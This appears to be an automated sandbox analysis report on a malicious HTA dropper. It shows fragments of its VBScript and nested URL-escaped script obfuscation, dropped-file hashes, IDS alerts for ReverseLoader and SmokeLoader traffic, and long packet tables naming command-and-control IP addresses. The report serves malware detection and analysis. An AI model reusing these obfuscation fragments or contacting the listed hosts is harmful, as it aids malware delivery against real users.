Preview:	..........F.u.n.c.t.i.o.n. .e.n.g.o.m.a.d.e.l.a.(.B.y.V.a.l. .c.o.r.n.o.f.o.n.e.,. .B.y.V.a.l. .m.o.q.u.e.n.c.o.,. .B.y.V.a.l. .a.p.r.e.s.a.r.)..... . . . .D.i.m. .a.s.s.e.n.t.i.m.e.n.t.o..... . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.s.s.e.n.t.i.m.e.n.t.o. .>. .0..... . . . . . . . .c.o.r.n.o.f.o.n.e. .=. .L.e.f.t.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .-. .1.). .&. .a.p.r.e.s.a.r. .&. .M.i.d.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.m.o.q.u.e.n.c.o.).)..... . . . . . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.a.p.r.e.s.a.r.).,. .c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . .L.o.o.p..... . . . ..... . . . .e.n.g.o.m.a.d.e.l.a. .=. .c.o.r.n.o.f.o.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... .

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\djvbaae
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	4.801526423190794
Encrypted:	false
SSDEEP:	6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
MD5:	A3DCA41A950A7DF7ECE76A867A17400E
SHA1:	AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
SHA-256:	6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
SHA-512:	F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
Malicious:	false
Preview:	Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	2.3478224513716413
TrID:
File name:	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
File size:	182'569 bytes
MD5:	05dcffe1d8e8e209a90b522192ad8000
SHA1:	77c19b392d39bce4906b5c4e5f1ab0a0c9182dc7
SHA256:	35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5
SHA512:	11eafd5f126bb4873ec7be1dc6fe7246f3de8324c413073bc914827695ed1db1bb9b6e870414c0d4aba990a6a817d6c029f7aa02e5061434dcdb965a378b5734
SSDEEP:	48:4vahW5oZz7eWLB2ZfywyQhhY1ywyQbD6ngS5RJCS0d399Dd5nCYmIYZAjo3ueufc:4vCl17ZtQjtQhVFlfnnCO4AjovtQX5Q
TLSH:	49047C96EA3448DABBCC4E63BDFC739E3AB8275F62C60E95931B3412DD5039C588052C
File Content Preview:	<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T18:37:18.758930+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.4	49730	107.172.44.178	80	TCP
2024-11-18T18:37:26.824559+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	142.215.209.78	443	192.168.2.4	49731	TCP
2024-11-18T18:38:09.197379+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49781	46.173.214.24	80	TCP
2024-11-18T18:38:09.370502+0100	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	46.173.214.24	80	192.168.2.4	49781	TCP
2024-11-18T18:38:17.024024+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49817	46.173.214.24	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:37:18.076105118 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.081103086 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.081231117 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.081362963 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.086378098 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758707047 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758750916 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758764029 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758919954 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758932114 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758929968 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.758944035 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.758975983 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.758985043 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.759097099 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.759109974 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.759120941 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.759156942 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.759185076 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.759394884 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.761344910 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.763900042 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.763947010 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.763959885 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.763981104 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.764003992 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.764084101 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.764126062 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.878995895 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879034996 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879050970 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879074097 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879116058 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879230022 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879245043 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879303932 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879337072 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879379034 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879414082 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879427910 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879462004 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879703045 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879734993 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879759073 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879781961 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879796028 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879817009 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879849911 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.879964113 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.879976034 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880021095 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.880474091 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880532980 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.880543947 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880558014 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880588055 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.880601883 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.880836964 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880897999 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880912066 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.880942106 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.880968094 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.881057978 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.881072044 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.881133080 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.881696939 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.881747961 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.881762028 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.881797075 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.881817102 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.884031057 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.884094000 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.884160995 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999110937 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999140978 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999154091 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999222994 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999249935 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999272108 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999284029 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999296904 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999324083 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999353886 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999454021 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999465942 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999476910 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999494076 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999505997 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999538898 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999694109 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999738932 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999764919 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999778032 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999833107 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999861956 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999872923 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999886036 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:18.999913931 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:18.999933004 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000010967 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000025034 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000039101 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000097990 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000255108 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000268936 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000281096 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000292063 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000293970 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000303030 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000340939 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000520945 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000533104 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000545025 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000564098 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000611067 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000720024 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000762939 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000808954 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000822067 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000833988 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.000854969 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000880003 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.000946045 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001003981 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001015902 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001029968 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001040936 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001054049 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001061916 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001066923 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001092911 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001132965 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001333952 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001389027 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001430035 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001442909 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001482010 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001497030 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001581907 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001602888 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001616001 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001627922 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001630068 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.001641989 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001667976 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.001682997 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.002008915 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.002022028 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.002032995 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.002044916 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.002057076 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.002057076 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.002080917 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.002119064 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.043479919 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.043555021 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.043567896 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.043621063 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.043654919 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120126009 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120171070 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120188951 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120244026 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120300055 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120321989 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120346069 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120358944 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120368004 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120371103 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120426893 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120455980 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120578051 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120645046 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120717049 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120729923 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120742083 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120753050 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120767117 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120769024 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120779037 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.120800018 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.120846987 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121104002 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121117115 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121157885 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121185064 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121705055 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121718884 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121731997 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121745110 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121757030 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121763945 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121769905 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121783972 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121797085 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121805906 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121809959 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121822119 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121830940 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121834993 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121850014 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121861935 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.121881008 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121881008 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.121936083 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.122514009 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.122528076 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.122539997 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.122553110 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:19.122570992 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:19.122600079 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:23.785815954 CET	80	49730	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:23.785984993 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:24.914846897 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:24.914891005 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:24.914968014 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:24.926203966 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:24.926214933 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.794078112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.794260025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:25.798046112 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:25.798053980 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.798278093 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.817361116 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:25.859338045 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.981722116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.982225895 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.982234001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.982351065 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:25.982357979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:25.982409954 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.101891041 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.102154970 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.102165937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.103127956 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.103214025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.103219986 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.104238987 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.104463100 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.104473114 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.105608940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.105693102 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.105700016 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.160228968 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.222095013 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.222106934 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.222325087 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.222335100 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.222400904 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.222481012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.222527027 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.222534895 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.222549915 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.223102093 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.223212957 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.223218918 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.223737001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.223838091 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.223843098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.224308014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.224417925 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.224423885 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.224699020 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.224745989 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.224761009 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.224765062 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.224807978 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.224813938 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.225054979 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.226825953 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.226924896 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.226928949 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.227221012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.227291107 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.227296114 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.269546986 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.342235088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.342359066 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.342366934 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.342566013 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.342678070 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.342684031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.343040943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.343096018 CET	49731	443	192.168.2.4	142.215.209.78
